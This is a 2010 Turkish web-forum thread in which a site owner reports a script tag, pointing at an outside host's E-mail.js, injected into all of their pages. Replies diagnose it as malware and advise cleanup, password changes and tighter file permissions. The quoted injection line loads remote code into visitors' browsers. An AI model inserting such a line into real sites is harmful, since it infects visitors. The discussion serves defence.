• 17-10-2010, 13:27:14
    #1
    Merhaba arkadaslar...
    Kendi yazdigim bir scriptimde tesadufen soyle bir kod buldum.

    <script type="text/javascript" src="http://utmost.dawnandjimmy.us:8080/E-mail.js"></script>
    <!--2d4eaac8bea139c783930c8ce5a58db5-->
    100% eminim ki bunu ben koymadim. Nasil oluyorda bu kod benim scriptimdeki her sayfaya yerlestirilmis olabilir? Ve bu nedir, ne ise yarar?
  • 17-10-2010, 13:31:47
    #2
    Sence ne olabilir ?, Tabiki virüs. Pc ne format at, Ftp ni temizle...
  • 17-10-2010, 13:33:04
    #3
    iframe denilen virüs kodları tek tek bulup sildikten sonra şifre değiştir google indexlemeden
  • 17-10-2010, 13:43:26
    #4
    Virus veya zararli oldugundan elbette suphem yok.
    Ilk defa basima boyle birsey geldigi icin saskinliktan anlatmak istedigimi anlatamadim.
    Bunun benimle bir ilgisi olabilecegini sanmiyorum. Cunku 2 aydir bilgisayarim tamirdeydi.
    Daha oncesinde ise hic boyle birseye rastlamamistim.
    Bunun hosting sirketiyle bir alakasi olabilir mi, bunu merak ediyorum?
  • 17-10-2010, 13:46:17
    #5
    ASHES adlı üyeden alıntı: mesajı görüntüle
    Virus veya zararli oldugundan elbette suphem yok.
    Ilk defa basima boyle birsey geldigi icin saskinliktan anlatmak istedigimi anlatamadim.
    Bunun benimle bir ilgisi olabilecegini sanmiyorum. Cunku 2 aydir bilgisayarim tamirdeydi.
    Daha oncesinde ise hic boyle birseye rastlamamistim.
    Bunun hosting sirketiyle bir alakasi olabilir mi, bunu merak ediyorum?
    hosting şirketinizdeki bir açıktanda olabilir
    ama en büyük sebebi siziz bilgisayarınızdır.
    arkadaşların dediğini yapın
    bilgisayara format atın en sağlam antivirüs programını kurun
    bu zararlı kodları silin
    ftp bilgilerinizi değiştirin ve dosyaları yeniden yükleyin
    bütün dosyaları tek tek kontrol edin yoksa bu virüs her defasında sitenize tekrar eklenecektir.
  • 17-10-2010, 13:50:37
    #6
    Aciklamalariniz icin hepinize tesekkur ederim.
    Bu yolu deneyeyim, eger yine ayni problemi yasarsam demekki sorun hostingle alakali.
    Tekrar tesekkurler.
  • 17-10-2010, 14:24:50
    #7
    Üyeliği durduruldu
    Gizemli seyleri cok severim.
    Ama bu pek gizemli degil,
    iframe virusu bu

  • 17-10-2010, 14:40:20
    #8
    1. Sunucunuzda erişim açığı var.
    2. Hostinginizde bulunan herhangi bir siteye shell yedirilmiş olup , oradan sizin "footer" dosyanızda eğer chmod değeri 777 civarlarındaysa yani uzaktan düzenleme imkanı varsa bu kod eklenmiş olablir.
    3. http://utmost.dawnandjimmy.us:8080/E-mail.js indirmek için girdim ama dosya yok.
    4.
    Alıntı
    google indexlemeden
    demiş arkadaş zaten indexlemiştir büyük ihtimal.
    5. Ana dizindeki dosyaların , chmod değerlerini düşür.
    6. Hosting sahibiyle konuş , Linux'u güvenli hale getirsinler.

    Neyse herşeyi söylemeyeyim .